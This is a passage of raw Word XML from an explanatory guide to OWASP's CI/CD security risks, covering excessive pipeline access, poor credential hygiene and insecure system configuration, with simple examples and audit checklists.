      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D1BF6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Concerned primarily with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096AF92" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Human/user identity and permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA299D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B4101" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Developer → Jenkins Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679A7F5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SEC-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D230A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Concerned with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A629F2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What the pipeline/job itself is allowed to access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA417A9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012C73B5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Build Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F9AE8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC679F1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3840F8B7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9264C4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>AWS administrator permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E307657" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The pipeline shouldn't need that much access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438B7DB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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF214A4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Suppose you have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EA761" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Development Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537F8E0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>It only needs to deploy to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F536B89" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Development environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E514F84" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But its service account has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406478C2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production deployment permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979836A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Database admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B36AA6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Cloud admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F46C8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Secret manager admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B56D4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's excessive pipeline-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEB359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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499316E0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>For every pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE17C66" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">What resources can it access? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E138C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">What credentials does it use? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0A811" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can the build pipeline access production? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C7595" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can a test job access production secrets? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7B410" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Does the deployment job have unnecessary permissions? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3A8F8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are permissions separated by environment? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A62629" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are service accounts scoped appropriately? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6812B44E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lastRenderedPageBreak/>
        <w:t>Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C0421" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-5 = What can the pipeline itself access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C574020" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="69F4A4F8">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43F92B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6. CICD-SEC-6 — Insufficient Credential Hygiene</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBAD60A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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B21B4B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CI/CD credentials are stored, exposed, reused, or managed poorly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CDE808" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Examples of credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B684E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED334E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>API keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D60F4D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315E040" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Cloud credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948EAF0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Git tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69E469" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Database passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426C6736" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Deployment tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C05F01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Bad example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160981C8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C49606" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC18C7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">  - echo "AWS_SECRET=abcd1234"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F77C4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The secret is directly written in the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54725C24" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's bad credential hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245A4EC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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4D565" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Jenkins has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B2721" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>AWS_PROD_ACCESS_KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE919F7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>AWS_PROD_SECRET_KEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96180A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>and every developer can view or retrieve them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824DC20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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D7CB5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>A password is stored inside:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4617B9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>config.properties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B090A98" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>and committed to Git.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E842C3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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55E8A4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are secrets stored in a secrets manager? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA9F16" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are credentials hardcoded? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F460216" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are secrets exposed in pipeline logs? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAB977" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are credentials rotated? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A0245" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are credentials unnecessarily long-lived? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B75C418" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are credentials shared? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF09AF1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can developers retrieve production credentials? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7501AB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are secrets scoped to the required job? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCDC92C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are revoked credentials actually removed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB84D6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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313D624" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-6 = Are CI/CD secrets handled safely?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0AF919" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="6969B7DA">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02FBA4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7. CICD-SEC-7 — Insecure System Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C87F7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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478C9D9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The CI/CD infrastructure itself is configured insecurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E46FBD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>This could include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F5A56" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Jenkins </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02596352" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">GitLab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43FE9B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Bitbucket </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B5487" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Build servers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536B62E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Runners </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7D535" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Agents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB2B91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83474B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Kubernetes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7652FE7B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Deployment servers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9A6CC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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80D286" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A Jenkins server is running with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05194689" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Default admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B39FCE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>No MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470677DA" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Unpatched version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30D41D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
